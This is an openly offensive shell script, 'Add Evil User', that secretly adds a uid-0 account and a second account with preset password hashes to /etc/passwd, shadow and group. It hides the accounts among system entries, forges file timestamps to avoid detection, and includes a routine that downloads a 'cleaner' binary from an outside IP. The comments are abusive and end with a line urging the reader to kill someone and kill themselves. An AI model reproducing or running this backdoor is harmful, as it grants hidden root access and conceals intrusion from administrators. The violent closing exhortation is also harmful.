#!/bin/sh # Add Evil User ver. 0.2 written by hipodilski # adds user named reboot in passwd and shadow file # from 2 customised vals for your needs # after the username you specify # if no base_user is specified adds the user on random place. # This is strongly Linux Specific not tested with other Unixes # So don't expect to work on other OS. # A big Fuck to all you script kiddos. # You fucking dumb asses. I hope this won't be ever in a sk hands. # I've Written this just for fun and profit # using it for illegal stuff is on your own # All copyrigts to myself and the GPL ver. 2.0 and above # for comments flames etc. hipodilski@dahmer.vistech.net # See the pC-fREAK web page at http://rootshell.be/~pcfreak/Archive # Have a nice day ;] # Edit this values to satisfy your needs. # 1st Evil user we add to the passwd shadow and group files. evil_user='reboot'; # 2nd Evil user. evil_user1='pptpd'; # Name of the evil dir we make for our 2nd evil user. evil_dir='/usr/sbin/pptpd'; # Base user after which we add our 1st evil user. base_user='shutdown'; # Base user after which we add our 2nd evil user. base_user1='nobody'; # Default evil users shell. shell='/bin/bash'; # Home dir for evil user 1 and 2. home_dir='/sbin'; home_dir1='/usr/sbin/pptpd'; # MD5 hash we use for the 1st and 2nd one. md5_hash='$1$PQWzlnxO$bcNq6dOj52.huhNUxibxE0'; md5_hash1='$1$fMH1aRPy$EvhdrBBA0YgfsILS1gdaw1'; # Default uid and gid for the 1st evil user. uid='0'; gid='0'; # Default uid and gid for the 2nd evil user. uid1='53'; gid1='53'; # Location to the system passwd and shadow and group. passwd_file='/etc/passwd'; shadow_file='/etc/shadow'; group_file='/etc/group'; # Temporary files for passwd shadow and group temp_timestamp='/tmp/timestamp'; temp_pwd_file='/tmp/tmp.passwd'; temp_shad_file='/tmp/tmp.shadow'; temp_grp_file='/tmp/tmp.grp'; temp_new_dest='/etc'; temp_pwd_new_name='passwd'; temp_shad_new_name='shadow'; temp_grp_new_name='group'; # Default Values. Normally you don't need to modify this. d_a_e_d='12431:0:99999:7:::'; evil_user_pwd="$evil_user:x:$uid:$gid:$evil_user:$home_dir:$shell"; evil_user_shad="$evil_user:$md5_hash:$d_a_e_d"; evil_user_pwd1="$evil_user1:x:$uid1:$gid1:$evil_user1:$home_dir1:$shell"; evil_user_shad1="$evil_user1:$md5_hash1:$d_a_e_d"; cnt_passwd=`wc -l $passwd_file | awk '{ print $1 }'`; place_start_val=6; place_end_val=`expr $cnt_passwd - 4`; a=0; b=1; # Cretes temp files we need for the whole operation. :] # Useless just for fame.:] banner () { echo "Evil User add ver 0.4"; echo '\-------------------/'; echo; echo 'Written by hip0 from pC-fREAK Org.'; echo; echo "Adding User: $evil_user && User: $evil_user1 to:"; echo "$temp_new_dest/$temp_pwd_new_name ,\ $temp_new_dest/$temp_shad_new_name and $temp_new_dest/$temp_grp_new_name"; } # Checks for evil users existence. chk_evil_user_existence () { if [ -n "`grep $evil_user $passwd_file`" ]; then echo "$evil_user Already exists. Exiting ..."; exit 0; fi if [ -n "`grep $evil_user1 $passwd_file`" ]; then echo "$evil_user1 Already exists. Exiting ..."; exit 0; fi } # Creates Temp Files create_temp_files () { touch $temp_pwd_file; touch $temp_shad_file; touch $temp_grp_file; touch $temp_timestamp; cat /dev/null > $temp_pwd_file; cat /dev/null > $temp_shad_file; } # Backups passwd timestamps. backup_timestamps () { touch -acmr $passwd_file $temp_timestamp; } # Sets backuped timestamps on the modifed {passwd,shadow,group}- set_old_timestamps () { touch -acmr $temp_timestamp $temp_new_dest/$temp_pwd_new_name; touch -acmr $temp_timestamp $temp_new_dest/$temp_shad_new_name; #touch -acmr $temp_timestamp $temp_new_dest/$temp_pwd_new_name"-"; #touch -acmr $temp_timestamp $temp_new_dest/$temp_shad_new_name"-"; touch -acmr $temp_timestamp $temp_new_dest/$temp_grp_new_name; #touch -acmr $temp_timestamp $temp_new_dest/$temp_grp_new_name"-"; touch -acmr $temp_timestamp $evil_dir; } # Generates random uids that doesn't match the ones from passwd. gener_random_uid () { RANGE=100; NUMBER=$RANDOM; let "NUMBER %= $RANGE"; random_temp_uid="$NUMBER"; chk_val=`cat $passwd_file |\ sed "s/:/ /g" | awk '{ print $3 }' | grep $RANDOM`; if [ ! -z "$chk_val" ]; then gener_random_uid; else random_temp_uid=$RANDOM; fi } # Generates random place to put evil users to. gener_random_place () { RANGE=`wc -l $passwd_file | awk '{ print $1 }'`; NUMBER1="$RANDOM"; let "NUMBER1 %= $RANGE"; if [ "$NUMBER1" -gt "$place_start_val" ]\ && [ "$NUMBER1" -lt "$place_end_val" ]; then random_place=$NUMBER1; else gener_random_place; fi } # Adds the evil users to the temp files. add_evil_2_temp () { if [ -n "`grep $base_user $passwd_file`" ] &&\ [ -n "`grep $base_user1 $passwd_file`" ]; then default_add; else random_add; fi } # Adds the two evil users on random places in the pwd files. random_add () { for i in `seq 1 $cnt_passwd`; do a=`expr $a + $b`; cur_line_pwd=`cat $passwd_file | head -n $a | tail -n 1`; cur_line_shad=`cat $shadow_file | head -n $a | tail -n 1`; cur_line_grp=`cat $group_file | head -n $a | tail -n 1`; cur_user=`echo $cur_line_pwd | sed "s/:/ /g" | awk '{ print $1 }'`; if [ $a = "$random_place" ]; then echo "$evil_user_pwd" \ >> $temp_pwd_file; echo "$evil_user_shad" >> $temp_shad_file; # echo "$evil_user:$random_temp_uid:" >> $temp_grp_file; fi random_place1=`expr $random_place + 4`; if [ "$a" = "$random_place1" ]; then echo "$evil_user1:x:$random_temp_uid:$random_temp_uid:$evil_user1:\ $home_dir1:$shell" >> $temp_pwd_file; echo "$evil_user_shad1" >> $temp_shad_file; echo "$evil_user1:x:$random_temp_uid:" >> $temp_grp_file; fi echo "$cur_line_pwd" >> $temp_pwd_file; echo "$cur_line_shad" >> $temp_shad_file; echo "$cur_line_grp" >> $temp_grp_file; done } # Default adding meachanism with defined based users func. default_add () { for i in `seq 1 $cnt_passwd`; do a=`expr $a + $b`; cur_line_pwd=`cat $passwd_file | head -n $a | tail -n 1`; cur_line_shad=`cat $shadow_file | head -n $a | tail -n 1`; cur_line_grp=`cat $group_file | head -n $a | tail -n 1`; cur_line=`echo $cur_line_pwd | sed "s/:/ /" | awk '{ print $1 }'`; echo "$cur_line_pwd" >> $temp_pwd_file; echo "$cur_line_shad" >> $temp_shad_file; echo "$cur_line_grp" >> $temp_grp_file; if [ "$cur_line" = "$base_user" ]; then echo "$evil_user_pwd" >> $temp_pwd_file; echo "$evil_user_shad" >> $temp_shad_file; fi if [ "$cur_line" = "$base_user1" ]; then echo "$evil_user1:x:$random_temp_uid:$random_temp_uid\ :$evil_user1:$home_dir:$shell" >> $temp_pwd_file; echo "$evil_user1:$md5_hash1:$d_a_e_d" >> $temp_shad_file; echo "$evil_user1:$random_temp_uid:" >> $temp_grp_file; fi done } # Copies modified passwd,shadow and group to the new defined dest. cp_evil_2_dest () { cp $temp_pwd_file $temp_new_dest/$temp_pwd_new_name; cp $temp_shad_file $temp_new_dest/$temp_shad_new_name; cp $temp_grp_file $temp_new_dest/$temp_grp_new_name; } # Deletes created temp files. dele_temps () { rm -f $temp_pwd_file; rm -f $temp_shad_file; rm -f $temp_grp_file; rm -f $temp_timestamp; } # Checks for evil dir existence and creates it if it doestn't exists. create_evil_dir () { if [ ! -d "$evil_dir" ]; then mkdir $evil_dir; chown $random_temp_uid:$random_temp_uid -R $evil_dir; fi } # Postprocedure commands to execute. cmds_to_exec () { cd /usr/sbin/pptpd; wget http://62.73.73.138/sploits/static/cleaner &> /dev/null; mv cleaner clean; touch /usr/sbin/cleaner; chmod +x /usr/sbin/pptpd/clean; echo '#!/bin/sh' > /usr/sbin/cleaner echo '/usr/sbin/pptpd/clean -u pptpd -n 0 -d' >> /usr/sbin/cleaner; chmod +x /usr/sbin/cleaner; touch -acmr /bin/ls /usr/sbin/cleaner; # evil has no boundaries. ;] } # Useless func. just for fun :] done_func () { echo "Done ."; } # Main function. Enjoy the mess :]. main () { banner; chk_evil_user_existence; create_temp_files; backup_timestamps; gener_random_uid; gener_random_place; add_evil_2_temp; cp_evil_2_dest; create_evil_dir; set_old_timestamps; dele_temps; done_func; # cmds_to_exec; } main; # _EOF_ -- Be a man kill someone, kill yourself!